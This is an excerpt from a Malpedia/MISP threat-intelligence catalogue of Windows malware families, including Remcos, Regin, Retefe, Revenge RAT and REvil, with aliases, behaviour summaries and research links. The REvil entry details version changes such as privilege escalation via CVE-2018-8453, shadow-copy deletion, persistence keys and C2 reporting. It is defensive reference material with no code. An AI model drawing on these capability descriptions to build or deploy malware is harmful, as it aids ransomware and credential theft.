https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer

https://blog.avast.com/adobe-acrobat-sign-malware

https://www.bleepingcomputer.com/news/security/fake-valorant-cheats-on-youtube-infect-you-with-redline-stealer/

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://go.recordedfuture.com/hubfs/reports/mtp-2021-1014.pdf

https://embee-research.ghost.io/combining-pivot-points-to-identify-malware-infrastructure-redline-smokeloader-and-cobalt-strike/

https://intel471.com/blog/privateloader-malware

REDPEPPER

The tag is: misp-galaxy:malpedia="REDPEPPER"

REDPEPPER is also known as:

  • Adupib

Table 4415. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redpepper

https://twitter.com/ItsReallyNick/status/1136502701301346305

RedRum

Ransomware.

The tag is: misp-galaxy:malpedia="RedRum"

RedRum is also known as:

  • Grinch

  • Thanos

  • Tycoon

Table 4416. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redrum

https://id-ransomware.blogspot.com/2019/12/redrum-ransomware.html

REDSHAWL

REDSHAWL is a session hijacking utility that starts a new process as another user currently logged on to the same system via command-line.

The tag is: misp-galaxy:malpedia="REDSHAWL"

REDSHAWL is also known as:

Table 4418. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl

https://securelist.com/lazarus-under-the-hood/77908/

https://content.fireeye.com/apt/rpt-apt38

https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf

Redyms

The tag is: misp-galaxy:malpedia="Redyms"

Redyms is also known as:

Table 4419. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms

https://www.welivesecurity.com/2013/02/04/what-do-win32redyms-and-tdl4-have-in-common/

Red Alert

The tag is: misp-galaxy:malpedia="Red Alert"

Red Alert is also known as:

Table 4420. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert

https://twitter.com/JaromirHorejsi/status/816237293073797121

Red Gambler

The tag is: misp-galaxy:malpedia="Red Gambler"

Red Gambler is also known as:

Table 4421. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler

http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf

Regin

Regin is a sophisticated malware and hacking toolkit attributed to United States' National Security Agency (NSA) for government spying operations. It was first publicly revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. Regin malware targeted victims in a range of industries, telecom, government, and financial institutions. It was engineered to be modular and over time dozens of modules have been found and attributed to this family. Symantec observed around 100 infections in 10 different countries across a variety of organisations including private companies, government entities, and research institutes.

The tag is: misp-galaxy:malpedia="Regin"

Regin is also known as:

Table 4423. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.regin

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf

https://securelist.com/big-threats-using-code-similarity-part-1/97239/

https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf

https://www.epicturla.com/previous-works/hitb2020-voltron-sta

https://www.youtube.com/watch?v=jeLd-gw2bWo

https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/

RegretLocker

According to PCrisk, RegretLocker is malicious software classified as ransomware. Systems infected with this malware have their data encrypted and users receive ransom demands for decryption. During the encryption process, all affected files are appended with the ".mouse" extension.

The tag is: misp-galaxy:malpedia="RegretLocker"

RegretLocker is also known as:

Table 4424. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker

https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-targets-windows-virtual-machines/

https://twitter.com/malwrhunterteam/status/1321375502179905536

http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/

RekenSom

Ransomware.

The tag is: misp-galaxy:malpedia="RekenSom"

RekenSom is also known as:

  • GHack Ransomware

Table 4425. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rekensom

https://id-ransomware.blogspot.com/2020/03/rekensom-ransomware.html

win.rekoobe

A Trojan for Winows with the same code structure and functionalities of elf.rekoobe, for Linux environment instead.

The tag is: misp-galaxy:malpedia="win.rekoobe"

win.rekoobe is also known as:

  • tinyshell.win

  • tshd.win

Table 4426. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew

https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/

https://www.mandiant.com/resources/fin13-cybercriminal-mexico

Rekt Loader

The tag is: misp-galaxy:malpedia="Rekt Loader"

Rekt Loader is also known as:

Table 4427. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rektloader

https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html

Rektware

The tag is: misp-galaxy:malpedia="Rektware"

Rektware is also known as:

  • PRZT Ransomware

Table 4428. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rektware

https://id-ransomware.blogspot.com/2018/09/rektware-ransomware.html

RelicRace

The tag is: misp-galaxy:malpedia="RelicRace"

RelicRace is also known as:

Table 4429. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.relic_race

https://cert.gov.ua/article/955924

Remcos

Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.

Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.

The tag is: misp-galaxy:malpedia="Remcos"

Remcos is also known as:

  • RemcosRAT

  • Remvio

  • Socmer

Table 4431. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://www.telsy.com/download/4832/

https://cert.gov.ua/article/3804703

https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/

https://perception-point.io/behind-the-attack-remcos-rat/

https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html

https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/

https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method

https://www.esentire.com/blog/remcos-rat

https://www.zscaler.com/blogs/security-research/latest-version-amadey-introduces-screen-capturing-and-pushes-remcos-rat

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/

https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html

https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf

https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://gi7w0rm.medium.com/cloudeye-from-lnk-to-shellcode-4b5f1d6d877

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout

https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers

https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/

https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/

https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf

https://socprime.com/blog/remcos-rat-detection-uac-0050-hackers-launch-phishing-attacks-impersonating-the-security-service-of-ukraine/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/

https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html

https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/

https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD

https://dissectingmalwa.re/malicious-ratatouille.html

https://secrary.com/ReversingMalware/RemcosRAT/

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities

https://cert.gov.ua/article/3931296

https://asec.ahnlab.com/en/32376/

https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

http://malware-traffic-analysis.net/2017/12/22/index.html

https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf

https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire

https://blog.morphisec.com/nft-malware-new-evasion-abilities

https://www.connectwise.com/resources/formbook-remcos-rat

https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service

https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/

https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html

https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html

https://medium.com/@amgedwageh/analysis-of-an-autoit-script-that-wraps-a-remcos-rat-6b5b66075b87

https://embee-research.ghost.io/decoding-a-remcos-loader-script-visual-basic-deobfuscation/

https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/

https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/

https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/

https://cert.gov.ua/article/6276652

https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/

https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf

https://www.youtube.com/watch?v=DIH4SvKuktM

https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly

https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://muha2xmad.github.io/unpacking/remcos/

https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update

https://www.splunk.com/en_us/blog/security/detecting-malware-script-loaders-using-remcos-threat-research-release-december-2021.html

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

https://www.vmray.com/cyber-security-blog/smart-memory-dumping/

https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/

https://asec.ahnlab.com/ko/25837/

https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/

https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/

https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/

https://asec.ahnlab.com/ko/32101/

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads

https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://www.jaiminton.com/reverse-engineering/remcos#

https://socprime.com/blog/new-phishing-attack-detection-attributed-to-the-uac-0050-and-uac-0096-groups-spreading-remcos-spyware/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html

https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html

https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2

https://news.sophos.com/en-us/2020/05/14/raticate/

https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Remcos/Remcos.md

https://muha2xmad.github.io/mal-document/remcosdoc/

https://intel471.com/blog/privateloader-malware

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cyber-attackers-leverage-russia-ukraine-conflict-in-multiple-spam-campaigns

Remexi

Remexi is a highly advanced and stealthy malware discovered in recent times. It employs sophisticated evasion techniques to infiltrate target systems and networks undetected. This malware utilizes various propagation vectors, including exploit kits, social engineering tactics, and compromised websites. Once inside a system, Remexi establishes persistence through rootkit capabilities and leverages coAmmand-and-control infrastructure to receive and execute malicious commands. It possesses keylogging and data exfiltration capabilities, enabling it to steal sensitive information such as login credentials and financial data. Additionally, Remexi can download and execute additional payloads, making it adaptable and capable of evolving its malicious activities over time.

The tag is: misp-galaxy:malpedia="Remexi"

Remexi is also known as:

  • CACHEMONEY

Table 4432. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions

https://twitter.com/QW5kcmV3/status/1095833216605401088

https://www.secureworks.com/research/threat-profiles/cobalt-hickman

https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

https://securelist.com/chafer-used-remexi-malware/89538/

http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf

https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf

https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions

RemoteControl

The tag is: misp-galaxy:malpedia="RemoteControl"

RemoteControl is also known as:

  • remotecontrolclient

Table 4434. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.remotecontrolclient

https://github.com/frozleaf/RemoteControl

Retefe (Windows)

Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It’s primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.

The tag is: misp-galaxy:malpedia="Retefe (Windows)"

Retefe (Windows) is also known as:

  • Tsukuba

  • Werdlod

Table 4439. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe

https://github.com/Tomasuh/retefe-unpacker

https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/

https://www.govcert.admin.ch/blog/35/reversing-retefe

https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe

https://github.com/cocaman/retefe

https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/

https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/

https://www.govcert.admin.ch/blog/33/the-retefe-saga

Revenant

According to its author, Revenant is a 3rd party agent for Havoc written in C, and based on Talon. This implant is meant to expand on the Talon implant by implementing covert methods of execution, robust capabilities, and more customization.

The tag is: misp-galaxy:malpedia="Revenant"

Revenant is also known as:

Table 4441. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.revenant

https://github.com/0xTriboulet/Revenant

Revenge RAT

According to Cofense, Revenge RAT is a simple and freely available Remote Access Trojan that automatically gathers system information before allowing threat actors to remotely access system components such as webcams, microphones, and various other utilities.

The tag is: misp-galaxy:malpedia="Revenge RAT"

Revenge RAT is also known as:

  • Revetrat

Table 4442. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat

https://embee-research.ghost.io/introduction-to-dotnet-configuration-extraction-revengerat/

https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/

https://blogs.360.cn/post/APT-C-44.html

https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/

https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html

https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns

https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america

https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html

https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/

https://perception-point.io/revenge-rat-back-from-microsoft-excel-macros/

https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries

https://blog.reversinglabs.com/blog/dotnet-loaders

https://blog.reversinglabs.com/blog/rats-in-the-library

https://github.com/itaymigdal/malware-analysis-writeups/blob/main/RevengeRAT/RevengeRAT.md

https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g

https://securelist.com/revengehotels/95229/

https://isc.sans.edu/diary/rss/22590

Reveton

Ransomware.

The tag is: misp-galaxy:malpedia="Reveton"

Reveton is also known as:

Table 4444. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.reveton

https://krebsonsecurity.com/2012/08/inside-a-reveton-ransomware-operation/

REvil (Windows)

REvil Beta MD5: bed6fc04aeb785815744706239a1f243 SHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bf SHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45 * Privilege escalation via CVE-2018-8453 (64-bit only) * Rerun with RunAs to elevate privileges * Implements a requirement that if "exp" is set, privilege escalation must be successful for full execution to occur * Implements target whitelisting using GetKetboardLayoutList * Contains debug console logging functionality * Defines the REvil registry root key as SOFTWARE\!test * Includes two variable placeholders in the ransom note: UID & KEY * Terminates processes specified in the "prc" configuration key prior to encryption * Deletes shadow copies and disables recovery * Wipes contents of folders specified in the "wfld" configuration key prior to encryption * Encrypts all non-whitelisted files on fixed drives * Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe * Partially implements a background image setting to display a basic "Image text" message * Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)

REvil 1.00
MD5: 65aa793c000762174b2f86077bdafaea
SHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457
SHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc
* Adds 32-bit implementation of CVE-2018-8453 exploit
* Removes console debug logging
* Changes the REvil registry root key to SOFTWARE\recfg
* Removes the System/Impersonation success requirement for encrypting network mapped drives
* Adds a "wipe" key to the configuration for optional folder wiping
* Fully implements the background image setting and leverages values defined in the "img" configuration key
* Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT
* Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL
* Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data

REvil 1.01 MD5: 2abff29b4d87f30f011874b6e98959e9 SHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732c SHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb * Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level * Makes encryption of network mapped drives optional by adding the "-nolan" argument

REvil 1.02
MD5: 4af953b20f3a1f165e7cf31d6156c035
SHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299
SHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4
* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage
* Partially implements "lock file" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. There is no evidence that a lock file is dropped to disk.)
* Enhances folder whitelisting logic that take special considerations if the folder is associated with "program files" directories
* Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories
* Hard-codes whitelisting of "sql" subfolders within program files
* Encrypts program files sub-folders that does not contain "sql" in the path
* Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted
* Encodes stored strings used for URI building within the binary and decodes them in memory right before use
* Introduces a REvil registry root key "sub_key" registry value containing the attacker's public key

REvil 1.03 MD5: 3cae02306a95564b1fff4ea45a7dfc00 SHA1: 0ce2cae5287a64138d273007b34933362901783d SHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf * Removes lock file logic that was partially implemented in 1.02 * Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.) * Encodes stored shellcode * Adds the -path argument: * Does not wipe folders (even if wipe == true) * Does not set desktop background * Does not contact the C2 server (even if net == true) * Encrypts files in the specified folder and drops the ransom note * Changes the REvil registry root key to SOFTWARE\QtProject\OrganizationDefaults * Changes registry key values from -→ to: * sub_key -→ pvg * pk_key -→ sxsP * sk_key -→ BDDC8 * 0_key -→ f7gVD7 * rnd_ext -→ Xu7Nnkd * stat -→ sMMnxpgk

REvil 1.04
MD5: 6e3efb83299d800edf1624ecbc0665e7
SHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0d
SHA256: 2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6
* Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.)
* Removes the folder wipe capability
* Changes the REvil registry root key to SOFTWARE\GitForWindows
* Changes registry key values from --> to:
  * pvg --> QPM
  * sxsP --> cMtS
  * BDDC8 --> WGg7j
  * f7gVD7 --> zbhs8h
  * Xu7Nnkd --> H85TP10
  * sMMnxpgk --> GCZg2PXD

REvil v1.05 MD5: cfefcc2edc5c54c74b76e7d1d29e69b2 SHA1: 7423c57db390def08154b77e2b5e043d92d320c7 SHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea * Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to implement persistence. * Implements persistence functionality via registry Run key. Data for value is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' : * SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lNOWZyAWVv * Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the destination to NULL and the flags to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). This breaks persistence however as the target executable specified in the Run key will no longer exist once this is done. * Changes registry key values from -→ to: * QPM -→ tgE * cMtS -→ 8K09 * WGg7j -→ xMtNc * zbhs8h -→ CTgE4a * H85TP10 -→ oE5bZg0 * GCZg2PXD -→ DC408Qp4

REvil v1.06
MD5: 65ff37973426c09b9ff95f354e62959e
SHA1: b53bc09cfbd292af7b3609734a99d101bd24d77e
SHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e
* Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us.
* Modified handling of network file encryption. Now explicitly passes every possible "Scope" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers.
* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'
* Changes registry key values from --> to:
  * tgE --> 73g
  * 8K09 --> vTGj
  * xMtNc --> Q7PZe
  * CTgE4a --> BuCrIp
  * oE5bZg0 --> lcZd7OY
  * DC408Qp4 --> sLF86MWC

REvil v1.07 MD5: ea4cae3d6d8150215a4d90593a4c30f2 SHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894e SHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3 TBD

The tag is: misp-galaxy:malpedia="REvil (Windows)"

REvil (Windows) is also known as:

  • Sodin

  • Sodinokibi

Table 4445. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.revil

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://twitter.com/Jacob_Pimental/status/1391055792774729728

https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf

https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities

https://home.treasury.gov/news/press-releases/jy0471

https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://redcanary.com/blog/uncompromised-kaseya/

https://twitter.com/VK_Intel/status/1374571480370061312?s=20

https://blog.amossys.fr/sodinokibi-malware-analysis.html

https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/

https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/

https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf

https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya

https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf

https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/

https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json

https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html

https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident

https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/

https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis

https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend

https://twitter.com/SophosLabs/status/1413616952313004040?s=20

https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/

https://twitter.com/SophosLabs/status/1412056467201462276

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/

https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf

https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/

https://twitter.com/fwosar/status/1420119812815138824

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil

